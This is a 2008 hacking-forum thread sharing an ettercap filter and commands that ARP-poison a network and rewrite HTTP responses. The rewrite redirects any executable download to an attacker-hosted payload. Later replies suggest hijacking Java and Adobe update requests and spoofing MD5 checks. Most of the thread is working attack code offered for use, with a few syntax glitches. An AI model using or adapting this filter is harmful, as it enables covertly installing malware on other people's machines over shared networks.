Replace *.EXE with MSF payload ..

operat0r · #1 (**permalink**) 08-06-2008, 10:39 AM

VIDEO:

http://blip.tv/file/1185726/

* works in firefox great
* works in opera but after about 10seconds ( this is reasonable )
* works in IE7

Code:

# replace rmccurdy with your website
# replace the url with what ever exe you like





if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
          # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("keep-alive", "close" ");
replace("Keep-Alive", "close" ");

}



if (ip.proto == TCP && search(DATA.data, ": application") ){
# enable for logging log(DECODED.data, "/tmp/log.log");
msg("found EXE\n");
# "Win32" is the first part of the exe example:
# if the EXE started with "this program must be run in MSDOS mode" you could search for MSDOS etc ..
if (search(DATA.data, "Win32")) {
msg("doing nothing\n");
} else {
replace("200 OK", "301 Moved Permanently
Location: http://www.rmccurdy.com/scripts/quickclean.exe
");
msg("redirect success\n");

}
}

for example on howto use etterfilter/ettercap / more goodies:
Own Full patched XP box via HTTP

Code:

# etterfilter makes the exe.ef to use with ettercap

etterfilter exe.filter -o exe.ef
# run ettercap on target
ettercap -T -q -F exe.ef -M ARP // // -P autoadd

ShadowKill · #2 (**permalink**) 08-06-2008, 12:39 PM

Quote:

Originally Posted by operat0r

I was listening to podcast pauldotcom.com was talking about evilgrade

what about ettercap /dns spoof that would replace and update agent that is a http get to an EXE or any executable for that matter.

what ever app what gets and EXE file over HTTP is replaced with a MS payload EXE

can this be done with say a simple 302 redirect for all EXE's maybe .. err

I don't really see why it couldn't be. The only issue I see is that you would need to perhaps write a script to rename your payload .EXE to that of the original. Otherwise, the user might catch it and either delete it and retry or start poking around for clues as to why they keep downloading the same file over and over again....

Quote:

Originally Posted by operat0r

Humm is that possible to have an ettercap filter pass a var to a shell script ?

think about all the apps that have updates that are not listed in the evilgrade .. adobe etc... even add support for some kind of md5 MIM so if it trys to get some md5 hash just send it the hash for your MS payload...

Code:

java updates
http://java.sun.com/update/1.6.0/map-1.6.0.xml
http://javadl-esd.sun.com/update/1.6.0/map-1.6.0.xml
http://javadl-esd.sun.com/update/1.6.0/1.6.0_07-b06.xml

maybe some kind of apache mod_rewrite that does the renaming of the file for you.. if ettercap can't do regex etc ... ?

Sounds feasible to me, but there's only one way to know for sure right?

Quote:

Originally Posted by operat0r

shoud I put exe\n or exe\r ??

still can't get it working ..

as in match exe and the new line or carriage return ?

I would assume that it'd be \n as \r is just a hard coded "Enter" correct? I'll tfiddle around with it in a while and let you know the outcome.

operat0r · #3 (**permalink**) 08-19-2008, 11:36 AM

Ok so got it working in IE7 not sure if I need 1/2 the code in the filter but it works so have fun !

I added code to make the filter and run ettercap

Thread Tools
Show Printable Version Email this Page
Display Modes
Linear Mode Switch to Hybrid Mode Switch to Threaded Mode